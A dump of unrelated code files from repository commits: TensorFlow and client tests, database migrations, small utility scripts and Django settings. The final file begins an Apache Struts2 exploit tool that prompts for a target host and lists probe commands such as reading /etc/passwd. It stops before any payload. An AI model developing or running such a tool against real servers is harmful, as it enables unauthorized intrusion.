jhseu/tensorflow,cxxgtxy/tensorflow,renyi533/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,arborh/tensorflow,sarvex/tensorflow,gautam1858/tensorflow,annarev/tensorflow,frreiss/tensorflow-fred,sarvex/tensorflow,frreiss/tensorflow-fred,xzturn/tensorflow,Intel-tensorflow/tensorflow,ppwwyyxx/tensorflow,yongtang/tensorflow,gunan/tensorflow,gunan/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,aam-at/tensorflow,gautam1858/tensorflow,adit-chandra/tensorflow,adit-chandra/tensorflow,ppwwyyxx/tensorflow,ppwwyyxx/tensorflow,xzturn/tensorflow,aam-at/tensorflow,frreiss/tensorflow-fred,paolodedios/tensorflow,annarev/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,ppwwyyxx/tensorflow,paolodedios/tensorflow,annarev/tensorflow,petewarden/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,xzturn/tensorflow,ppwwyyxx/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,xzturn/tensorflow,karllessard/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,sarvex/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,yongtang/tensorflow,xzturn/tensorflow,Intel-tensorflow/tensorflow,aam-at/tensorflow,aam-at/tensorflow,petewarden/tensorflow,freedomtan/tensorflow,yongtang/tensorflow,aam-at/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,renyi533/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow-pywrap_saved_model,aldian/tensorflow,cxxgtxy/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,freedomtan/tensorflow,aldian/tensorflow | tensorflow/compiler/mlir/tensorflow/tests/tf_saved_model/debug_info.py | tensorflow/compiler/mlir/tensorflow/tests/tf_saved_model/debug_info.py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# RUN: %p/debug_info | FileCheck %s
# pylint: disable=missing-docstring,line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from tensorflow.compiler.mlir.tensorflow.tests.tf_saved_model import common
class TestModule(tf.Module):
@tf.function(input_signature=[
tf.TensorSpec([], tf.float32),
tf.TensorSpec([], tf.float32)
])
def some_function(self, x, y):
return x + y
# Basic check that the debug info file is being correctly saved and loaded.
#
# CHECK: "tf.AddV2"{{.*}}callsite("{{[^"]*}}/debug_info.py":{{[0-9]+}}:{{[0-9]+}}
if __name__ == '__main__':
common.do_test(TestModule, show_debug_info=True)
| # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# RUN: %p/debug_info | FileCheck %s
# pylint: disable=missing-docstring,line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from tensorflow.compiler.mlir.tensorflow.tests.tf_saved_model import common
class TestModule(tf.Module):
@tf.function(input_signature=[
tf.TensorSpec([], tf.float32),
tf.TensorSpec([], tf.float32)
])
def some_function(self, x, y):
return x + y
# Basic check that the debug info file is being correctly saved and loaded.
#
# CHECK: "tf.AddV2"{{.*}}callsite("{{[^"]*}}/debug_info.py"
if __name__ == '__main__':
common.do_test(TestModule, show_debug_info=True)
| apache-2.0 | Python |
7b0005eb7d2b2e05a9fd833a2771573aec69c199 | Add script for comparing test vectors. | BBN-Q/QGL,BBN-Q/QGL | tests/compare_test_data.py | tests/compare_test_data.py | import os
import sys
import glob
import h5py
from QGL import *
import QGL
BASE_AWG_DIR = QGL.config.AWGDir
BASE_TEST_DIR = './test_data/awg/'
def compare_sequences():
test_subdirs = ['TestAPS1', 'TestAPS2']
for subdir in test_subdirs:
testdirs = glob.glob(os.path.join(BASE_TEST_DIR, subdir, '*'))
for test in testdirs:
# build up subdirectory name
_,name = os.path.split(test)
testfiles = glob.glob(os.path.join(test, '*'))
# recurse into subdirectories
while len(testfiles) == 1 and os.path.isdir(testfiles[0]):
_,subname = os.path.split(testfiles[0])
name = os.path.join(name, subname)
testfiles = glob.glob(os.path.join(testfiles[0], '*'))
newpath = os.path.join(BASE_AWG_DIR, subdir, name)
print("{0} comparing to {1}".format(test, newpath))
newfiles = glob.glob(os.path.join(newpath, '*'))
PulseSequencePlotter.plot_pulse_files_compare(testfiles, newfiles)
c = input('Enter to continue (q to quit)')
if c == 'q':
break
def update_test_files():
for device in ['APS1', 'APS2']:
testdirs = glob.glob(os.path.join(BASE_TEST_DIR, 'Test'+device, '*'))
for test in testdirs:
testfiles = glob.glob(os.path.join(test, '*'))
# recurse into subdirectories
while len(testfiles) == 1 and os.path.isdir(testfiles[0]):
testfiles = glob.glob(os.path.join(testfiles[0], '*'))
for tfile in testfiles:
FID = h5py.File(tfile)
FID['/'].attrs['target hardware'] = device
FID.close()
if __name__ == '__main__':
# run the following line if you are comparing to older h5 files that don't
# have the 'target hardware' attribute
# update_test_files()
output_file()
compare_sequences()
| apache-2.0 | Python | |
bf9a5c6f14cfbafe544fcc27f146410afcc84fea | Add migrations for number_of_streams. | streamr/marvin,streamr/marvin,streamr/marvin | migrations/versions/19b7fe1331be_.py | migrations/versions/19b7fe1331be_.py | """Add number_of_streams to movies.
Revision ID: 19b7fe1331be
Revises: 2c76677d803f
Create Date: 2013-11-16 22:11:44.560000
"""
# revision identifiers, used by Alembic.
revision = '19b7fe1331be'
down_revision = '2c76677d803f'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('movie', sa.Column('number_of_streams', sa.Integer(), nullable=False, server_default='0'))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('movie', 'number_of_streams')
### end Alembic commands ###
| mit | Python | |
692f8ab50f4ecf8d40605d535e85077b8e79c510 | Add client test for test_pods | ramielrowe/python-magnumclient,ramielrowe/python-magnumclient,openstack/python-magnumclient | magnumclient/tests/v1/test_pods.py | magnumclient/tests/v1/test_pods.py | # Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import testtools
from testtools import matchers
from magnumclient.tests import utils
from magnumclient.v1 import pods
POD1 = {'id': 123,
'uuid': '66666666-7777-8888-9999-000000000000',
'name': 'pod1',
'desc': "desc",
'bay_uuid': '5d12f6fd-a196-4bf0-ae4c-1f639a523a52',
'images': ['image1', 'image2'],
'labels': {'foo': 'bar'},
'status': 'Running'
}
POD2 = {'id': 124,
'uuid': '66666666-7777-8888-9999-000000000001',
'name': 'pod1',
'desc': "desc",
'bay_uuid': '5d12f6fd-a196-4bf0-ae4c-1f639a523a53',
'images': ['image1', 'image2'],
'labels': {'foo': 'bar'},
'status': 'Running'
}
CREATE_POD = {'pod_definition_url': 'file:///a/b.json'}
UPDATED_POD = copy.deepcopy(POD1)
NEW_DESCR = 'new-description'
UPDATED_POD['description'] = NEW_DESCR
fake_responses = {
'/v1/pods':
{
'GET': (
{},
{'pods': [POD1, POD2]},
),
'POST': (
{},
CREATE_POD,
),
},
'/v1/pods/%s' % POD1['id']:
{
'GET': (
{},
POD1
),
'DELETE': (
{},
None,
),
'PATCH': (
{},
UPDATED_POD,
),
},
}
class PodManagerTest(testtools.TestCase):
def setUp(self):
super(PodManagerTest, self).setUp()
self.api = utils.FakeAPI(fake_responses)
self.mgr = pods.PodManager(self.api)
def test_pod_list(self):
pods = self.mgr.list()
expect = [
('GET', '/v1/pods', {}, None),
]
self.assertEqual(expect, self.api.calls)
self.assertThat(pods, matchers.HasLength(2))
def test_pod_show(self):
pod = self.mgr.get(POD1['id'])
expect = [
('GET', '/v1/pods/%s' % POD1['id'], {}, None)
]
self.assertEqual(expect, self.api.calls)
self.assertEqual(POD1['name'], pod.name)
self.assertEqual(POD1['desc'], pod.desc)
def test_pod_create(self):
pod = self.mgr.create(**CREATE_POD)
expect = [
('POST', '/v1/pods', {}, CREATE_POD),
]
self.assertEqual(expect, self.api.calls)
self.assertTrue(pod)
def test_pod_delete(self):
pod = self.mgr.delete(POD1['id'])
expect = [
('DELETE', '/v1/pods/%s' % POD1['id'], {}, None),
]
self.assertEqual(expect, self.api.calls)
self.assertIsNone(pod)
def test_update(self):
patch = {'op': 'replace',
'value': NEW_DESCR,
'path': '/description'}
pod = self.mgr.update(id=POD1['id'], patch=patch)
expect = [
('PATCH', '/v1/pods/%s' % POD1['id'], {}, patch),
]
self.assertEqual(expect, self.api.calls)
self.assertEqual(NEW_DESCR, pod.description)
| apache-2.0 | Python | |
3d10dd8b18096ba51ed4b837f8b297d015258a96 | Add conftest for UI testing | CodeForPhilly/chime,CodeForPhilly/chime,CodeForPhilly/chime | tests/dash_app/conftest.py | tests/dash_app/conftest.py | from pytest import fixture
from selenium.webdriver.chrome.options import Options
from dash_app import app
def pytest_setup_options():
options = Options()
options.add_argument('--disable-gpu')
options.add_argument('--headless')
options.add_argument("--no-sandbox")
options.add_argument("--disable-extensions")
return options
@fixture
def test_app(dash_duo):
dash_duo.start_server(app)
yield dash_duo
| mit | Python | |
98213db5448f73edb039912bbdf6dd2f69ce26a4 | Add the migration. Oops. | quiltdata/quilt-compiler,quiltdata/quilt,quiltdata/quilt-compiler,quiltdata/quilt,quiltdata/quilt-compiler,quiltdata/quilt-compiler,quiltdata/quilt,quiltdata/quilt,quiltdata/quilt | migrations/versions/c3500625bed8_.py | migrations/versions/c3500625bed8_.py | """empty message
Revision ID: c3500625bed8
Revises: 3dcc171e7253
Create Date: 2017-02-21 16:08:43.397517
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = 'c3500625bed8'
down_revision = '3dcc171e7253'
branch_labels = None
depends_on = None
def upgrade():
op.rename_table('blob', 'instance')
op.alter_column('log', 'blob_id', new_column_name='instance_id', existing_type=sa.BigInteger())
op.alter_column('version', 'blob_id', new_column_name='instance_id', existing_type=sa.BigInteger())
op.alter_column('tag', 'blob_id', new_column_name='instance_id', existing_type=sa.BigInteger())
def downgrade():
op.rename_table('instance', 'blob')
op.alter_column('log', 'instance_id', new_column_name='blob_id', existing_type=sa.BigInteger())
op.alter_column('version', 'instance_id', new_column_name='blob_id', existing_type=sa.BigInteger())
op.alter_column('tag', 'instance_id', new_column_name='blob_id', existing_type=sa.BigInteger())
| apache-2.0 | Python | |
514f744bc39129a241e704e4ea282befcd31b1b7 | Add about page functional test | andela-kndungu/compshop,kevgathuku/compshop,andela-kndungu/compshop,andela-kndungu/compshop,kevgathuku/compshop,kevgathuku/compshop,kevgathuku/compshop,andela-kndungu/compshop | tests/functional/test_about_page.py | tests/functional/test_about_page.py | from .base import FunctionalTest
class AboutPageTest(FunctionalTest):
def test_about_page_navigation(self):
self.browser.get(self.live_server_url)
self.browser.set_window_size(1024, 768)
about_link = self.browser.find_element_by_link_text('ABOUT US')
about_link.click()
# Assert that the About Us link in the navbar works
self.assertIn("About Us", self.browser.title)
self.assertEqual(self.browser.find_element_by_tag_name('h1').text, 'About Us')
| bsd-3-clause | Python | |
0e877e6124d370a0d628d12e387d5614ab4c6a6a | Create hacktorial.py | dhellen/Some-Math | hacktorial.py | hacktorial.py | #!/usr/bin/env python
# I got really excited about the recursive functions that come with Python
# Factorial
def factorial(z):
return reduce((lambda a, b: a*b), xrange(1, z+1))
# Some narrow functions as reference for broader functions:
''' A. The sum of squares is limited to only getting sums with exponent of 2,
so here is a function to calculate the sum (or series, really) of a power of
your choosing:'''
def series_of_powers(z, expo):
return sum([y**expo for y in xrange(1, z+1)])
# B. Square of power of sums (or series, really):
def series_to_a_power(z, expo):
return (sum(xrange(1, z+1)))**expo
''' I heard you liked functions, so I put a bunch of function parameters in
these function parameters, so you can pass functions to your functions.
'''
''' Operation of powers (think sum of squares, but it's any operation and any
exponent). I made xrange go backwards so that lambdas for subtracting and
dividing would make sense.
'''
def oppower(z, expo, alambdaorfunc):
return reduce(alambdaorfunc, [y**expo for y in xrange(z, 0, -1)])
''' For example:
oppower(6,2,lambda z,y: z-y)
produces 6**2 - 5**2 - 4**2 - 3**2 - 2**2 - 1**2, or -19
'''
''' Power of operations (think square of sums). Again, I made xrange go
backwards so that lambdas for subtracting and dividing would make sense.
'''
def powops(z, expo, alambdaorfunc):
return (reduce(alambdaorfunc, xrange(z, 0, -1)))**expo
''' For example
powops(6,3,lambda z,y:z**y)
carries out ( (((((6**5)**4)**3)**2)**1) )**3, which is:
13628565259765240063307214694325589634102920113198019054884331531100689326724922
71228635903677560908387368131503998319547415800033207941032383559081748787333663
34155884618443998783841969103173072216240445102125485099344220416740519344692695
59871047548851882918239704585019039154176L
'''
''' It occurred to me as I was recording the example for powops() that factorial
is a bit limited. So, here is another function based on factorial that you can
customize. It differs from simply just a call to reduce(<function>, <sequence>)
because I set an xrange that goes backwards as the sequence for every call.
'''
def hacktorial(z, alambdaorfunc):
return reduce(alambdaorfunc, xrange(z, 0, -1))
| cc0-1.0 | Python | |
fb5a0d0cf9e3e14e418b06c373f26a2e6e2a7c1e | Read data from csv | liuisaiah/Hack-Brown2017,LWprogramming/Hack-Brown2017 | script.py | script.py | import numpy as np
import pandas
def main():
data = pandas.read_csv('sarcasm_v2.csv').as_matrix()
# print(data.shape)
data[:, 0] = np.array([find_category(x) for x in data[:, 0]])
data[:, 1] = np.array([sarcasm(x) for x in data[:, 1]])
# print(data[0,1]) # should be 1 for sarcasm
def find_category(category):
return {
'GEN': 0, # general
'HYP': 1, # hyperbole
'RQ': 2 # rhetorical question
}[category]
def sarcasm(sarcasm_value):
return {
'sarc': 1, # true for sarcasm
'notsarc': 0 # false for sarcasm
}[sarcasm_value]
def get_data_index(ID):
'''find the index of the data point. Corresponds to 1234 in GEN_sarc_1234 under ID in data.
'''
# TODO
if __name__ == '__main__':
main()
| mit | Python | |
350ea09999002935178bf6569411e56455167ff8 | add script to clean cells | adrn/DropOutput | drop_ipynb_output.py | drop_ipynb_output.py | #!/usr/bin/env python
"""
Suppress output and prompt numbers for IPython notebooks included in git
repositories.
By default, this script will tell git to ignore prompt numbers and
cell output when adding ipynb files to git repositories. Note that the
notebook files themselves are *not* changed, this script just filters
out the outputs before adding and committing with git.
This default behavior can be changed either on a notebook-by-notebook
basis, or for entire paths. To include output for a single notebook, modify
the metadata of the notebook (Edit -> Edit Notebook Metadata in the menu bar)
and add this:
"git" : { "suppress_output" : false }
to include output from that notebook. To include output for notebooks that
match a given glob pattern (e.g., for an entire path), you can create and
add paths to the file: ~/.config/git/clean_ipynb_ignore. For example, to
include output for all notebooks in ~/projects/notebooks that start with
"demo", add a line to the ignore file with:
~/projects/notebooks/demo*
See README.md for instructions on how to install this script.
"""
# Path to the ignore file
CLEAN_IPYNB_IGNORE_PATH = "~/.config/git/clean_ipynb_ignore"
# Standard library imports
import os
import sys
import json
import fnmatch
def dumpit(json_in):
json.dump(json_in, sys.stdout, sort_keys=True, indent=1, separators=(",",": "))
# the git smudge filter will "cat" the notebook file contents and pip in to this script
nb = sys.stdin.read()
json_in = json.loads(nb)
# we use the clean filter to pass the name of the file in to this script as a command-line argument
nb_filename = os.path.abspath(sys.argv[1])
if os.path.exists(CLEAN_IPYNB_IGNORE_PATH): # if the clean_ipynb_ignore file exists
with open(os.path.expanduser(CLEAN_IPYNB_IGNORE_PATH), "r") as f:
for line in f.readlines():
if line.strip(): # make sure the line is not empty
if fnmatch.fnmatch(nb_filename, line) or \
os.path.samefile(os.path.dirname(nb_filename, line)):
# check if the nb filename matches any of the glob patterns
# or is in an ignored directory
dumpit(json_in)
# get the metadata block of the notebook
metadata = json_in.get("metadata", dict())
# by default, suppress output and line numbers
suppress_output = True
if "git" in nb_metadata:
if "suppress_outputs" in nb_metadata["git"] and not nb_metadata["git"]["suppress_outputs"]:
suppress_output = False
# exit early and return the file as-is if we shouldn't filter output cells
if not suppress_output:
sys.stdout.write(nb)
exit()
def clean(cell):
""" Remove the output from a cell and clear the execution count. """
if "outputs" in cell:
cell["outputs"] = []
if "execution_count" in cell:
cell["execution_count"] = None
for cell in json_in["cells"]:
clean(cell)
dumpit(json_in)
| mit | Python | |
0bd974c21f42f7c2e0162b92ea1cde5ee5ff8060 | add wrapper to get all bootstrapped preds | judithfan/graphcomm,judithfan/graphcomm,judithfan/graphcomm | analysis/get_all_bootstrapped_model_predictions.py | analysis/get_all_bootstrapped_model_predictions.py | from __future__ import division
import os
import numpy as np
import pandas as pd
import analysis_helpers as h
'''
Wrapper around bootstrap_model_predictions.py.
It will spawn several threads to get bootstrap vectors from all splits and models.
Estimate uncertainty in estimates of key variables of interest that are derived from model predictions,
e.g., target rank, sketch cost. Estimate sampling uncertainty by resampling trials with replacement from the
test data set for each split, marginalizing out the parametric uncertainty (from param posterior).
Generate, for each model in model_space and each split_type in split_types, a boot_vec that is
nIter in length (nIter=1000), and can be used to estimate standard error both within split and to get
standard error estimate when combining across splits.
'''
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--nIter', type=int, help='how many bootstrap iterations?', default=1000)
args = parser.parse_args()
split_types = ['balancedavg1','balancedavg2','balancedavg3','balancedavg4','balancedavg5']
model_space = ['human_combined_cost','multimodal_fc6_combined_cost','multimodal_conv42_combined_cost',
'multimodal_fc6_S0_cost','multimodal_fc6_combined_nocost']
conditions = ['all','closer','further']
vois = ['target_rank','sign_diff_rank','cost']
nIter = args.nIter
print 'Now running ...'
for split_type in split_types:
for model in model_space:
for condition in conditions:
for var_of_interest in vois:
cmd_string = 'python bootstrap_model_predictions.py --split_type {} \
--model {} \
--condition {} \
--nIter {} \
--var_of_interest {}\
'.format(split_type,model,\
condition,nIter,\
var_of_interest)
print cmd_string
thread.start_new_thread(os.system,(cmd_string,)) | mit | Python | |
89464b86d3c94c5aea5aac15e0dc5b581ed2ac3f | Save olass/models/crud_mixin.py needs refactoring in order to have access to the `session` | ufbmi/olass-client,indera/olass-client | olass/models/crud_mixin.py | olass/models/crud_mixin.py | """
Goal: simplify the code when interacting with entities
"""
import sqlalchemy as db
class CRUDMixin():
""" Helper class sqlalchemy entities """
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
@classmethod
def get_by_id(cls, id):
if any(
(isinstance(id, str) and id.isdigit(),
isinstance(id, (int, float))),):
return cls.query.get(int(id))
return None
@classmethod
def create(cls, **kwargs):
""" Helper for session.add() + session.commit() """
instance = cls(**kwargs)
return instance.save()
def update(self, commit=True, **kwargs):
for attr, value in kwargs.items():
setattr(self, attr, value)
return self.save() if commit else self
def save(self, commit=True):
db.session.add(self)
if commit:
db.session.commit()
return self
def delete(self, commit=True):
db.session.delete(self)
return commit and db.session.commit()
| mit | Python | |
d445b65414325b9281ad6fcdc59ab4a2290d0bdc | Add missing migration | jonge-democraten/website,jonge-democraten/website,jonge-democraten/website,jonge-democraten/website | website/jdpages/migrations/0015_auto_20171209_1040.py | website/jdpages/migrations/0015_auto_20171209_1040.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jdpages', '0014_organisationmember_email'),
]
operations = [
migrations.AlterModelOptions(
name='blogcategorypage',
options={'ordering': ('_order',), 'verbose_name': 'Blog categorie pagina', 'verbose_name_plural': "Blog categorie pagina's"},
),
migrations.AlterModelOptions(
name='homepage',
options={'ordering': ('_order',), 'verbose_name': 'Home pagina', 'verbose_name_plural': "Home pagina's"},
),
migrations.AlterModelOptions(
name='organisationpage',
options={'ordering': ('_order',), 'verbose_name': 'Organisatie pagina', 'verbose_name_plural': "Organisatie pagina's"},
),
migrations.AlterModelOptions(
name='organisationpartpage',
options={'ordering': ('_order',), 'verbose_name': 'Organisatie-onderdeel pagina', 'verbose_name_plural': "Organisatie-onderdeel pagina's"},
),
migrations.AlterModelOptions(
name='visionpage',
options={'ordering': ('_order',), 'verbose_name': 'Standpunt pagina', 'verbose_name_plural': "Standpunt pagina's"},
),
migrations.AlterModelOptions(
name='visionspage',
options={'ordering': ('_order',), 'verbose_name': 'Standpunten pagina', 'verbose_name_plural': "Standpunten pagina's"},
),
migrations.AlterModelOptions(
name='wordlidpage',
options={'ordering': ('_order',), 'verbose_name': 'Word lid pagina', 'verbose_name_plural': "Standpunt pagina's"},
),
]
| mit | Python | |
59e909afcb5dc5e44703c25d183b9edce60882b6 | add comment | NCSSM-CS/CSAssess,NCSSM-CS/CSAssess,NCSSM-CS/CSAssess,NCSSM-CS/CSAssess | controller/addComment.py | controller/addComment.py | #!/usr/local/bin/python3
"""
created_by: Aninda Manocha
created_date: 3/5/2015
last_modified_by: Aninda Manocha
last_modified date: 3/5/2015
"""
# imports
import constants
import utils
import json
from sql.session import Session
from sql.user import User
from sql.comment import Comment
#Format of comment -AM
#requestType: addComment
#answer: Answer
#content: "string"
def iChooseU(json):
thisUser = utils.findUser(json)
answer = json["answer"]
theAnswer = Answer.get(answer["id"])[0]
content = json["content"]
newComment = Comment.noID(None, thisUser, theAnswer, content, ACTIVE)
newComment.add()
return utils.successJson(json)
| mit | Python | |
a46f3dd56b716cf2c9c918e4135d2248388ba030 | Change template debugging back to False | webyneter/cookiecutter-django,ryankanno/cookiecutter-django,webyneter/cookiecutter-django,pydanny/cookiecutter-django,hackebrot/cookiecutter-django,thisjustin/cookiecutter-django,bopo/cookiecutter-django,trungdong/cookiecutter-django,ad-m/cookiecutter-django,topwebmaster/cookiecutter-django,trungdong/cookiecutter-django,schacki/cookiecutter-django,luzfcb/cookiecutter-django,hairychris/cookiecutter-django,schacki/cookiecutter-django,trungdong/cookiecutter-django,gappsexperts/cookiecutter-django,hackebrot/cookiecutter-django,gappsexperts/cookiecutter-django,schacki/cookiecutter-django,topwebmaster/cookiecutter-django,aleprovencio/cookiecutter-django,ryankanno/cookiecutter-django,schacki/cookiecutter-django,kappataumu/cookiecutter-django,bopo/cookiecutter-django,bopo/cookiecutter-django,webyneter/cookiecutter-django,asyncee/cookiecutter-django,webspired/cookiecutter-django,mistalaba/cookiecutter-django,ad-m/cookiecutter-django,luzfcb/cookiecutter-django,ryankanno/cookiecutter-django,ddiazpinto/cookiecutter-django,ddiazpinto/cookiecutter-django,thisjustin/cookiecutter-django,aleprovencio/cookiecutter-django,ad-m/cookiecutter-django,hackebrot/cookiecutter-django,mistalaba/cookiecutter-django,ddiazpinto/cookiecutter-django,mistalaba/cookiecutter-django,topwebmaster/cookiecutter-django,asyncee/cookiecutter-django,mistalaba/cookiecutter-django,topwebmaster/cookiecutter-django,webyneter/cookiecutter-django,Parbhat/cookiecutter-django-foundation,ryankanno/cookiecutter-django,hackebrot/cookiecutter-django,kappataumu/cookiecutter-django,gappsexperts/cookiecutter-django,hairychris/cookiecutter-django,ddiazpinto/cookiecutter-django,webspired/cookiecutter-django,gappsexperts/cookiecutter-django,hairychris/cookiecutter-django,pydanny/cookiecutter-django,asyncee/cookiecutter-django,luzfcb/cookiecutter-django,webspired/cookiecutter-django,thisjustin/cookiecutter-django,pydanny/cookiecutter-django,trungdong/cookiecutter-django,Parbhat/cookiecutter-django-foundation,luzfcb/cookiecutter-django,hairychris/cookiecutter-django,thisjustin/cookiecutter-django,pydanny/cookiecutter-django,aleprovencio/cookiecutter-django,aleprovencio/cookiecutter-django,asyncee/cookiecutter-django,Parbhat/cookiecutter-django-foundation,kappataumu/cookiecutter-django,ad-m/cookiecutter-django,bopo/cookiecutter-django,webspired/cookiecutter-django,kappataumu/cookiecutter-django,Parbhat/cookiecutter-django-foundation | {{cookiecutter.project_slug}}/config/settings/test.py | {{cookiecutter.project_slug}}/config/settings/test.py | # -*- coding: utf-8 -*-
'''
Test settings
- Used to run tests fast on the continuous integration server and locally
'''
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
# Turn debug off so tests run faster
DEBUG = False
TEMPLATES[0]['OPTIONS']['debug'] = False
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='CHANGEME!!!')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
# In-memory email backend stores messages in django.core.mail.outbox
# for unit testing purposes
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
# CACHING
# ------------------------------------------------------------------------------
# Speed advantages of in-memory caching without having to run Memcached
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# PASSWORD HASHING
# ------------------------------------------------------------------------------
# Use fast password hasher so tests run faster
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.MD5PasswordHasher',
)
# TEMPLATE LOADERS
# ------------------------------------------------------------------------------
# Keep templates in memory so tests run faster
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
]),
]
| # -*- coding: utf-8 -*-
'''
Test settings
- Used to run tests fast on the continuous integration server and locally
'''
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
# Turn debug off so tests run faster
DEBUG = False
# But template debugging must be enabled for django_coverage_plugin
TEMPLATES[0]['OPTIONS']['debug'] = True
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='CHANGEME!!!')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
# In-memory email backend stores messages in django.core.mail.outbox
# for unit testing purposes
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
# CACHING
# ------------------------------------------------------------------------------
# Speed advantages of in-memory caching without having to run Memcached
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# PASSWORD HASHING
# ------------------------------------------------------------------------------
# Use fast password hasher so tests run faster
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.MD5PasswordHasher',
)
# TEMPLATE LOADERS
# ------------------------------------------------------------------------------
# Keep templates in memory so tests run faster
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
]),
]
| bsd-3-clause | Python |
e9b057d13e99dbcbbcf77467de49c6472f042b42 | Add files via upload | R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit- | Struts2_Shell001.py | Struts2_Shell001.py | #!/usr/bin/python
import urllib2
import os, sys, time
__Author__="Rvbk"
RED = '\033[1;31m'
BLUE = '\033[94m'
BOLD = '\033[1m'
GREEN = '\033[32m'
OTRO = '\033[36m'
YELLOW = '\033[33m'
ENDC = '\033[0m'
def cls():
os.system(['clear', 'cls'][os.name == 'nt'])
cls()
logo = BLUE+'''
*******************************************
* [!] Exploit Apache Struts2 {*}DEMO *
*******************************************
Code of Rvbk ''' +ENDC
print logo
print " * Usage: www.victima.com/files.login\n\n"
host = raw_input(BOLD+" [+] HOST con http(s)> "+ENDC)
print "\n"
if host.find("https://") == -1:
if host.find("http://") == -1:
host = "http://"+host
def validador():
arr_lin_win = ["file /etc/passwd","dir"]
return arr_lin_win
if len(host) > 0:
def exploit(comando):
